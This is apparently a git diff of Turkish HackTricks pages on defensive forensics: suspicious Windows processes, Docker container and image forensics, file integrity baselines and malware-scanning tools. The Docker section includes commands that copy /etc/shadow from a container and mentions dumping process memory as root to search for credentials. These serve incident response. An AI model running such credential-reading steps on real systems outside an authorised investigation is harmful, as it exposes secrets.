**Giriş yapan kullanıcı başına yalnızca 1** süreç oluşturulmalıdır.
Bu, sonlandırılması gereken **userinit.exe** tarafından çalıştırılır, bu nedenle bu işlem için **ebeveyn görünmemel
Bu, **userinit.exe**'den çalıştırılır ve bu nedenle bu süreç için **ebeveyn** görünmemelidir.
# Zararlı Süreçleri Yakalama
* Beklenen yoldan mı çalışıyor? (Windows binary dosyaları geçici konumdan çalıştırılmaz)
* Garip IP adresleriyle iletişim kuruyor mu?
* Dijital imzaları kontrol edin (Microsoft ürünleri imzalı olmalıdır)
* Doğru yazılmış mı?
* Beklenen SID altında mı çalışıyor?
* Ebeveyn süreç beklenen mi (varsa)?
* Çocuk süreçler beklenen mi? (cmd.exe, wscript.exe, powershell.exe yok mu?)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekle</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönder.
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# Docker Adli Bilişim
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}
## Konteyner Değişikliği
## Container değişikliği
Bazı docker konteynerinin tehlikeye atıldığına dair şüpheler var:
```bash
@ -22,7 +23,7 @@ docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress
```
Bu konteyner üzerinde yapılan değişiklikleri görüntülemek için şunu kullanabilirsiniz:
Konteynır üzerinde yapılan değişiklikleri görüntülemek için şunu kullanabilirsiniz:
```bash
docker diff wordpress
C /var
@ -41,7 +42,7 @@ Eğer `/etc/shadow` gibi ilginç bir dosyanın değiştirildiğini fark ederseni
```bash
docker cp wordpress:/etc/shadow.
```
Ayrıca, yeni bir konteyner çalıştırarak ve dosyayı ondan çıkararak orijinaliyle karşılaştırabilirsiniz:
Ayrıca, yeni bir konteyner çalıştırarak ve dosyayı ondan çıkararak **orijinaliyle karşılaştırabilirsiniz**:
```bash
docker run -d lamp-wordpress
docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container
@ -53,14 +54,14 @@ docker exec -it wordpress bash
```
## Resim Modifikasyonları
Size bir dışa aktarılmış docker imajı verildiğinde (muhtemelen `.tar` formatında) [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) kullanarak **modifikasyonların özetini çıkarabilirsiniz**:
Size bir dışa aktarılmış docker imajı verildiğinde (muhtemelen `.tar` formatında) değişikliklerin özetini çıkarmak için [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) kullanabilirsiniz:
```bash
docker save <image> > image.tar #Export the image to a .tar file
container-diff analyze -t sizelayer image.tar
container-diff analyze -t history image.tar
container-diff analyze -t metadata image.tar
```
Ardından, görüntüyü **çözümleyebilir** ve şüpheli dosyaları aramak için değişiklik geçmişinde bulabileceğiniz bloklara **erişebilirsiniz**:
Ardından, görüntüyü **çözebilir** ve şüpheli dosyaları aramak için **bloklara erişebilirsiniz** bulduğunuz değişiklik geçmişinde:
```bash
tar -xf image.tar
```
@ -70,7 +71,7 @@ tar -xf image.tar
```bash
docker inspect <image>
```
Ayrıca şu komutla **değişikliklerin özet tarihçesini** alabilirsiniz:
Ayrıca bir özet **değişiklik geçmişi** alabilirsiniz:
```bash
docker history --no-trunc <image>
```
@ -81,7 +82,7 @@ dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
```
### Dalış
Docker görüntülerinde eklenen/değiştirilen dosyaları bulmak için [**dive**](https://github.com/wagoodman/dive) aracını da kullanabilirsiniz (indirmek için [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) sayfasına gidin):
Docker görüntülerinde eklenen/değiştirilen dosyaları bulmak için ayrıca [**dive**](https://github.com/wagoodman/dive) (indirmek için [**sürümler**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) bağlantısını kullanabilirsiniz):
```bash
#First you need to load the image in your docker repo
sudo docker load < image.tar 1
@ -90,30 +91,31 @@ Loaded image: flask:latest
#And then open it with dive:
sudo dive flask:latest
```
Bu, Docker görüntülerinin farklı blokları arasında gezinmenizi sağlar ve hangi dosyaların değiştirildiğini/eklendiğini kontrol edebilirsiniz. **Kırmızı** eklenen anlamına gelir ve **sarı** değiştirilen anlamına gelir. Diğer görünüme geçmek için **tab** tuşunu kullanın ve klasörleri daraltmak/açmak için **boşluk** tuşunu kullanın.
Bu, Docker görüntülerinin farklı blokları arasında gezinmenizi sağlar ve hangi dosyaların değiştirildiğini/eklendiğini kontrol edebilirsiniz. **Kırmızı** eklenen anlamına gelir ve **sarı** değiştirilen anlamına gelir. Diğer görünüme geçmek için **tab** tuşunu kullanın ve klasörleri kapatmak/açmak için **boşluk** tuşunu kullanın.
Die ile görüntünün farklı aşamalarının içeriğine erişemezsiniz. Bunun için **her katmanı açmanız ve erişmeniz gerekir**.\
Görüntünün tüm katmanlarını açmak için görüntünün açıldığı dizinden şu komutu çalıştırarak açabilirsiniz:
Görüntünün tüm katmanlarını açmak için görüntünün açıldığı dizinde şu komutu çalıştırarak açabilirsiniz:
```bash
tar -xf image.tar
for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done
```
## Bellekten Kimlik Bilgileri
Docker konteynerini bir ana makinede çalıştırdığınızda, **ana makineden konteynerde çalışan işlemleri görebilirsiniz** sadece `ps -ef` komutunu çalıştırarak
Dikkat edin, bir ana makine içinde bir docker konteyneri çalıştırdığınızda **konteynerde çalışan işlemleri ana makineden görebilirsiniz** sadece `ps -ef` komutunu çalıştırarak
Bu nedenle (kök olarak) **ana makineden işlemlerin belleğini dökerek** ve [**aşağıdaki örnekte olduğu gibi**](../../linux-hardening/privilege-escalation/#process-memory) **kimlik bilgilerini arayabilirsiniz**.
Bu nedenle (kök olarak) ana makineden işlemlerin belleğini **dökerek** ve [**aşağıdaki örnekte olduğu gibi**](../../linux-hardening/privilege-escalation/#process-memory) **kimlik bilgilerini arayabilirsiniz**.
{% hint style="success" %}
AWS Hacking'ini öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitimi AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ini öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitimi GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme becerilerini öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına PR gönderin.**
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# Temel
@ -18,13 +19,13 @@ HackTricks'ı desteklemenin diğer yolları:
Bir temel, bir sistemin belirli parçalarının anlık bir görüntüsünü alarak **gelecekteki bir durumla karşılaştırmak ve değişiklikleri vurgulamak** için oluşturulur.
Örneğin, dosya sistemindeki her dosyanın karma değerini hesaplayıp depolayarak hangi dosyaların değiştirildiğini bulabilirsiniz.\
Bu ayrıca oluşturulan kullanıcı hesapları, çalışan işlemler, çalışan hizmetler ve değişmemesi gereken veya hiç değişmemesi gereken diğer herhangi bir şeyle de yapılabilir.
Bu aynı zamanda oluşturulan kullanıcı hesapları, çalışan işlemler, çalışan hizmetler ve hiç veya çok az değişmemesi gereken diğer herhangi bir şey ile de yapılabilir.
## Dosya Bütünlüğü İzleme
Dosya Bütünlüğü İzleme (FIM), dosyalardaki değişiklikleri izleyerek IT ortamlarını ve verileri koruyan kritik bir güvenlik tekniğidir. İki temel adım içerir:
1. **Temel Karşılaştırma:** Gelecekteki karşılaştırmalar için dosya öznitelikleri veya kriptografik karma değerleri (örneğin MD5 veya SHA-2) kullanarak bir temel oluşturun ve değişiklikleri tespit etmek için.
1. **Temel Karşılaştırma:** Gelecekteki karşılaştırmalar için değişiklikleri tespit etmek için dosya öznitelikleri veya kriptografik karma değerleri (örneğin MD5 veya SHA-2) kullanarak bir temel oluşturun.
2. **Gerçek Zamanlı Değişiklik Bildirimi:** Dosyalara erişildiğinde veya değiştirildiğinde anında uyarılar alın, genellikle işletim sistemi çekirdek uzantıları aracılığıyla.
## Araçlar
@ -37,16 +38,17 @@ Dosya Bütünlüğü İzleme (FIM), dosyalardaki değişiklikleri izleyerek IT o
* [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına PR gönderin.**
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,20 +1,21 @@
# Kötü Amaçlı Yazılım Analizi
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olana kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Adli Bilişim Hile Kağıtları
## Adli Bilişim Hile Sayfaları
[https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
@ -37,7 +38,7 @@ sudo apt-get install -y yara
#### Kuralları hazırlayın
Bu betiği kullanarak github'dan tüm yara kötü amaçlı yazılım kurallarını indirin ve birleştirin: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
_**rules**_ adlı bir dizin oluşturun ve betiği çalıştırın. Bu, kötü amaçlı yazılımlar için tüm yara kurallarını içeren _**malware\_rules.yar**_ adlı bir dosya oluşturacaktır.
_**rules**_ adında bir dizin oluşturun ve betiği çalıştırın. Bu, kötü amaçlı yazılımlar için tüm yara kurallarını içeren _**malware\_rules.yar**_ adlı bir dosya oluşturacaktır.
```bash
wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
mkdir rules
@ -50,7 +51,7 @@ yara -w malware_rules.yar folder #Scan the whole folder
```
#### YaraGen: Zararlı yazılım kontrolü ve kurallar oluşturma
[**YaraGen**](https://github.com/Neo23x0/yarGen) aracını kullanarak bir ikiliden yara kuralları oluşturabilirsiniz. Bu eğitimlere göz atın: [**Bölüm 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Bölüm 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Bölüm 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
[**YaraGen**](https://github.com/Neo23x0/yarGen) adlı aracı kullanarak bir ikiliden yara kuralları oluşturabilirsiniz. Bu eğitimlere göz atın: [**Bölüm 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Bölüm 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Bölüm 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
```bash
python3 yarGen.py --update
python3.exe yarGen.py --excludegood -m ../../mals/
@ -69,7 +70,7 @@ clamscan folderpath #Scan the whole folder
```
### [Capa](https://github.com/mandiant/capa)
**Capa**, yürütülebilir dosyalardaki (PE, ELF, .NET) potansiyel olarak kötü niyetli **yetenekleri** tespit eder. Bu nedenle Att\&ck taktikleri gibi şeyleri veya şüpheli yetenekleri bulacaktır:
**Capa**, yürütülebilir dosyalardaki potansiyel kötü niyetli **yetenekleri** tespit eder: PE, ELF, .NET. Bu nedenle Att\&ck taktikleri gibi şeyleri veya şüpheli yetenekleri bulacaktır:
- OutputDebugString hatasını kontrol et
- bir hizmet olarak çalıştır
@ -79,15 +80,15 @@ clamscan folderpath #Scan the whole folder
### IOC'ler
IOC, Tehdit Belirleyici anlamına gelir. Bir IOC, bazı potansiyel istenmeyen yazılımları veya onaylanmış **zararlı yazılımları tanımlayan koşullar** kümesidir. Mavi Takımlar, bu tür kötü niyetli dosyaları **sistemlerinde** ve **ağlarında aramak** için bu tür tanımlamaları kullanır.\
IOC, Tehdit Belirtici anlamına gelir. Bir IOC, bazı potansiyel istenmeyen yazılımları veya onaylanmış **zararlı yazılımları tanımlayan koşullar** kümesidir. Mavi Takımlar, bu tür kötü niyetli dosyaları **sistemlerinde** ve **ağlarında aramak** için bu tür tanımlamaları kullanır.\
Bu tanımlamaları paylaşmak, bir bilgisayarda zararlı yazılım tanımlandığında ve o zararlı yazılım için bir IOC oluşturulduğunda, diğer Mavi Takımların zararlı yazılımı daha hızlı tanımlamasına yardımcı olur.
IOC'ler oluşturmak veya değiştirmek için bir araç [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**'dır.**\
IOC'ler oluşturmak veya değiştirmek için bir araç [**IOC Düzenleyici**](https://www.fireeye.com/services/freeware/ioc-editor.html)**'dır.**\
[**Redline**](https://www.fireeye.com/services/freeware/redline.html) gibi araçları kullanarak bir cihazda tanımlanmış IOC'leri **aramak** mümkündür.
### Loki
[**Loki**](https://github.com/Neo23x0/Loki), Basit Tehdit Göstergeleri için bir tarayıcıdır.\
[**Loki**](https://github.com/Neo23x0/Loki), Basit Tehdit Belirteçleri için bir tarayıcıdır.\
Tespit, dört tespit yöntemine dayanmaktadır:
```
1. File Name IOC
@ -104,7 +105,7 @@ Compares process connection endpoints with C2 IOCs (new since version v.10)
```
### Linux Zararlı Yazılım Tespiti
[**Linux Zararlı Yazılım Tespit (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/), GNU GPLv2 lisansı altında yayınlanan, paylaşımlı barındırma ortamlarında karşılaşılan tehditlere odaklanan bir Linux zararlı yazılım tarayıcısıdır. Ağ kenarı sızma tespit sistemlerinden tehdit verileri kullanarak saldırılarda aktif olarak kullanılan zararlı yazılımları çıkartır ve tespit için imzalar oluşturur. Ayrıca, tehdit verileri, LMD ödeme özelliği ve zararlı yazılım topluluk kaynakları ile kullanıcı gönderimlerinden de elde edilir.
[**Linux Zararlı Yazılım Tespit (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/), GNU GPLv2 lisansı altında yayınlanan, paylaşımlı barındırma ortamlarında karşılaşılan tehditlere odaklanılarak tasarlanmış bir Linux zararlı yazılım tarayıcısıdır. Ağ kenarı sızma tespit sistemlerinden tehdit verileri kullanarak saldırılarda aktif olarak kullanılan zararlı yazılımları çıkartır ve tespit için imzalar oluşturur. Ayrıca, tehdit verileri, LMD ödeme özelliği ve zararlı yazılım topluluk kaynakları ile de elde edilebilir.
### rkhunter
@ -114,7 +115,7 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
```
### FLOSS
[**FLOSS**](https://github.com/mandiant/flare-floss) farklı teknikler kullanarak yürütülebilir dosyalar içinde şifrelenmiş dizeleri bulmaya çalışan bir araçtır.
[**FLOSS**](https://github.com/mandiant/flare-floss) farklı teknikler kullanarak yürütülebilir dosyalar içinde şifrelenmiş dizeleri bulmaya çalışacak bir araçtır.
### PEpper
@ -134,11 +135,11 @@ sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--sk
### **php-malware-finder**
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) **şifrelenmiş**/**şüpheli kodları** ve genellikle **kötü amaçlı yazılımlarda**/web kabuklarında kullanılan **PHP** işlevlerini içeren dosyaları tespit etmek için elinden geleni yapar.
[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) **şifrelenmiş**/**şüpheli kodu** tespit etmek için elinden geleni yapar ve genellikle **kötü amaçlı yazılımlarda**/web kabuklarında kullanılan **PHP** işlevlerini kullanan dosyaları tespit eder.
### Apple Binary Signatures
Bazı **kötü amaçlı yazılım örneğini** kontrol ederken, binary'nin **imzasını kontrol etmek** her zaman önemlidir çünkü imzayı atan **geliştirici** muhtemelen zaten **kötü amaçlı yazılımla ilişkilidir.**
Bazı **kötü amaçlı yazılım örneğini** kontrol ederken, binary'nin **imzasını kontrol etmek** her zaman önemlidir çünkü imzayı atan **geliştirici** muhtemelen zaten **kötü amaçlı yazılımla ilişkilidir**.
```bash
#Get signer
codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@ -151,14 +152,29 @@ spctl --assess --verbose /Applications/Safari.app
```
## Algılama Teknikleri
### Dosya Yığma
### Dosya Yığılması
Eğer bir web sunucusunun **dosyalarını içeren bir klasörün** en son ne zaman **güncellendiğini** biliyorsanız, **web sunucusundaki tüm dosyaların oluşturulma ve değiştirilme tarihlerini kontrol edin** ve herhangi bir tarih **şüpheli** ise o dosyayı kontrol edin.
Eğer bir web sunucusunun **dosyalarını** içeren bir klasörün **en son ne zaman güncellendiğini** biliyorsanız. **Kontrol edin** ve **web sunucusundaki tüm dosyaların oluşturulma ve değiştirilme tarihlerini** ve herhangi bir tarih **şüpheli** ise o dosyayı kontrol edin.
### Temel Çizgiler
Bir klasörün dosyalarının **değiştirilmemesi gerektiğini** biliyorsanız, klasörün **orijinal dosyalarının** **hash'ini hesaplayabilir** ve **şu anki** dosyalarla **karşılaştırabilirsiniz**. Değiştirilen her şey **şüpheli** olacaktır.
Bir klasörün dosyalarının **değiştirilmemesi gerektiğini** biliyorsanız, klasörün **orijinal dosyalarının** **hash'ini hesaplayabilir** ve **mevcut** olanlarla **karşılaştırabilirsiniz**. Herhangi bir değişiklik **şüpheli** olacaktır.
### İstatistiksel Analiz
Bilgiler loglarda kaydedildiğinde, bir web sunucusunun her dosyasının kaç kez erişildiği gibi istatistikleri **kontrol edebilirsiniz**, çünkü bir web kabuğu en çok kullanılanlardan biri olabilir.
Bilgiler loglarda kaydedildiğinde, her bir web sunucusu dosyasının kaç kez erişildiği gibi istatistikleri **kontrol edebilirsiniz**, çünkü bir web kabuğu en çok olanlardan biri olabilir.
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Destek HackTricks</summary>
